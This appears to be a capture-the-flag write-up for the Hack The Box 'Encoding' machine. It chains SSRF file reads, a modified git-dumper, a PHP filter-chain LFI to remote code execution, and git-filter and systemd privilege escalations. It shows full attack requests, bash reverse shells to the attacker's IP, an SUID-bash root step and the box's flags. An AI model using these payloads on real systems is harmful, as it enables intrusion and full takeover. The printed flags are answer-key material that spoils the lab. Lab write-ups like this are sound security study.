# NMAP

```
Nmap scan report for 10.129.222.42
Host is up, received echo-reply ttl 63 (0.13s latency).
Scanned at 2023-01-29 19:29:28 EST for 11s

PORT   STATE SERVICE REASON         VERSION
22/tcp open  ssh     syn-ack ttl 63 OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 4fe3a667a227f9118dc30ed773a02c28 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBIzAFurw3qLK4OEzrjFarOhWslRrQ3K/MDVL2opfXQLI+zYXSwqofxsf8v2MEZuIGj6540YrzldnPf8CTFSW2rk=
|   256 816e78766b8aea7d1babd436b7f8ecc4 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIPTtbUicaITwpKjAQWp8Dkq1glFodwroxhLwJo6hRBUK
80/tcp open  http    syn-ack ttl 63 Apache httpd 2.4.52 ((Ubuntu))
|_http-server-header: Apache/2.4.52 (Ubuntu)
|_http-title: HaxTables
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```

# ENUM WEB PAGE

API endpoint

```
http://10.129.222.42/index.php?page=api
http://api.haxtables.htb/v3/tools/string/index.php
```

# SSRF

```
POST /v3/tools/string/index.php HTTP/1.1
Host: api.haxtables.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/json
Content-Length: 54

{"action":"urlencode","file_url":"file:///etc/passwd"}
```

`file:///etc/apache2/sites-available/000-default.conf`

```
<VirtualHost *:80>
	ServerName haxtables.htb
	ServerAdmin webmaster@localhost
	DocumentRoot /var/www/html
</VirtualHost>

<VirtualHost *:80>
	ServerName api.haxtables.htb
	ServerAdmin webmaster@localhost
	DocumentRoot /var/www/api
</VirtualHost>

<VirtualHost *:80>
    ServerName image.haxtables.htb
    ServerAdmin webmaster@localhost
	DocumentRoot /var/www/image
</VirtualHost>
```

`file:///var/www/image/utils.php`

```
function git_status()
{
    $status = shell_exec('cd /var/www/image && /usr/bin/git status');
    return $status;
}

function git_log($file)
{
    $log = shell_exec('cd /var/www/image && /ust/bin/git log --oneline "' . addslashes($file) . '"');
    return $log;
}

function git_commit()
{
    $commit = shell_exec('sudo -u svc /var/www/image/scripts/git-commit.sh');
    return $commit;
}
```

`file:///var/www/image/.git/HEAD`

```
ref: refs/heads/master
```

`file:///var/www/html/handler.php`

```
<?php
include_once '../api/utils.php';

if (isset($_FILES['data_file'])) {
    $is_file = true;
    $action = $_POST['action'];
    $uri_path = $_POST['uri_path'];
    $data = $_FILES['data_file']['tmp_name'];

} else {
    $is_file = false;
    $jsondata = json_decode(file_get_contents('php://input'), true);
    $action = $jsondata['action'];
    $data = $jsondata['data'];
    $uri_path = $jsondata['uri_path'];



    if ( empty($jsondata) || !array_key_exists('action', $jsondata) || !array_key_exists('uri_path', $jsondata)) 
    {
        echo jsonify(['message' => 'Insufficient parameters!']);
        // echo jsonify(['message' => file_get_contents('php://input')]);

    }

}

$response = make_api_call($action, $data, $uri_path, $is_file);
echo $response;

?>
```


# GIT-DUMPER

Modify line 144

```
curl -L -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36" -f -k -s "$url" -o "$target"
```

To:

```
curl -X POST -H 'Content-Type: application/json' --data-binary "{\"action\": \"str2hex\", \"file_url\": \"file:///var/www/image/.git/$objname\"}" 'http://api.haxtables.htb/v3/tools/string/index.php' | jq .data | xxd -r -p > "$target"
```

Execute command.

```
┌──(root㉿kali)-[~/htb/Box/Linux/Encoding]
└─# ./gitdumper.sh  http://image.haxtables.htb/.git/ image

┌──(root㉿kali)-[~/htb/Box/Linux/Encoding]
└─# cd image 
                                                                                                                                                 
┌──(root㉿kali)-[~/…/Box/Linux/Encoding/image]
└─# ls -la
total 12
drwxr-xr-x 3 root root 4096 Jan 29 20:57 .
drwxr-xr-x 3 root root 4096 Jan 29 20:57 ..
drwxr-xr-x 6 root root 4096 Jan 29 20:57 .git
```


# GIT CHECKOUT

```
┌──(root㉿kali)-[~/…/Box/Linux/Encoding/image]
└─# git checkout .   
Updated 7 paths from the index

┌──(root㉿kali)-[~/…/Box/Linux/Encoding/image]
└─# ls    
actions  assets  includes  index.php  scripts  utils.php
```


# EXECUTE COMMANDS PHP CHAIN

```
POST /handler.php HTTP/1.1
Host: 10.129.222.42
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json;charset=UTF-8
Content-Length: 117
Origin: http://10.129.222.42
Connection: close
Referer: http://10.129.222.42/index.php?page=string

{"action":"urlencode","data":"fg","uri_path":"doom@image.haxtables.htb/actions/action_handler.php?page=/etc/passwd&"}
```


```
┌──(root㉿kali)-[~/htb/Box/Linux/Encoding]
└─# python3 php_filter_chain_generator.py --chain "<?php system('bash -c \"bash -i >& /dev/tcp/10.10.14.111/1234 0>&1\"');?>"
[+] The following gadget chain will generate the following code : <?php system('bash -c "bash -i >& /dev/tcp/10.10.14.111/1234 0>&1"');?> (base64 value: PD9waHAgc3lzdGVtKCdiYXNoIC1jICJiYXNoIC1pID4mIC9kZXYvdGNwLzEwLjEwLjE0LjExMS8xMjM0IDA+JjEiJyk7Pz4)
php://filter/convert.iconv.UTF8.CSISO2022KR|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP866.CSUNICODE|convert.iconv.CSISOLATIN5.ISO_6937-2|convert.iconv.CP950.UTF-16BE..................
```

```
POST /handler.php HTTP/1.1
Host: 10.129.222.42
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json;charset=UTF-8
Content-Length: 12421
Origin: http://10.129.222.42
Connection: close
Referer: http://10.129.222.42/index.php?page=string

{"action":"urlencode","data":"fg","uri_path":"doom@image.haxtables.htb/actions/action_handler.php?page=php://filter/convert.iconv.UTF8.CSISO2022KR|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP866.CSUNICODE.....................
```

```
┌──(root㉿kali)-[~/htb/Box/Linux/Encoding]
└─# nc -lvnp 1234
listening on [any] 1234 ...
connect to [10.10.14.111] from (UNKNOWN) [10.129.222.42] 50076
bash: cannot set terminal process group (809): Inappropriate ioctl for device
bash: no job control in this shell
www-data@encoding:~/image/actions$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
```


# PRIV ESC SVC

```
www-data@encoding:~/image$ sudo -l
Matching Defaults entries for www-data on encoding:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User www-data may run the following commands on encoding:
    (svc) NOPASSWD: /var/www/image/scripts/git-commit.sh
```


# GIT ATTRIBUTES CLEAN SMUDGE

```
www-data@encoding:~/image$ echo "bash -c 'bash -i >& /dev/tcp/10.10.14.111/4444 0>&1'" > /tmp/doom
www-data@encoding:~/image$ echo '*.php filter=doom' > .git/info/attributes
www-data@encoding:~/image$ git config filter.doom.clean /tmp/doom
www-data@encoding:~/image$ sudo -u svc /var/www/image/scripts/git-commit.sh
```

```
┌──(root㉿kali)-[~/htb/Box/Linux/Encoding]
└─# nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.14.111] from (UNKNOWN) [10.129.222.42] 45542
svc@encoding:/var/www/image$ cd
svc@encoding:~$ cat user.txt 
b727bf2a72e347335064cd9ec030a7b7
```


# SYSTEMCTL PRIV ESC

```
svc@encoding:~$ sudo -l
Matching Defaults entries for svc on encoding:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User svc may run the following commands on encoding:
    (root) NOPASSWD: /usr/bin/systemctl restart *
```


# WRITE PERMISSIONS

```
svc@encoding:~$ ls -la /etc/systemd/
total 56
drwxr-xr-x    5 root root 4096 Jan 30 20:06 .
drwxr-xr-x  107 root root 4096 Jan 23 18:30 ..
drwxrwxr-x+  22 root root 4096 Jan 30 20:06 system
```

```
svc@encoding:~$ echo hola > /etc/systemd/system/hola.txt
svc@encoding:~$ cat /etc/systemd/system/hola.txt
hola
```


# RESTAR NEW SERVICE

```
svc@encoding:~$ echo '[Service]
Type=oneshot
ExecStart=/bin/sh -c "chmod +s /bin/bash"
[Install]
WantedBy=multi-user.target' > /etc/systemd/system/doom.service
svc@encoding:~$ sudo systemctl restart doom.service
svc@encoding:~$ ls -la /bin/bash
-rwsr-sr-x 1 root root 1396520 Jan  6  2022 /bin/bash
```

```
svc@encoding:~$ bash -p
bash-5.1# cat /root/root.txt
1022ad1a89d97220ebb2506614372df9
bash-5.1#
```

# REFERENCES
https://github.com/internetwache/GitTools/blob/master/Dumper/gitdumper.sh \
https://github.com/synacktiv/php_filter_chain_generator \
https://git-scm.com/book/en/v2/Customizing-Git-Git-Attributes \
https://developers.redhat.com/articles/2022/02/02/protect-secrets-git-cleansmudge-filter#create_the_filter_driver \
https://gtfobins.github.io/gtfobins/systemctl/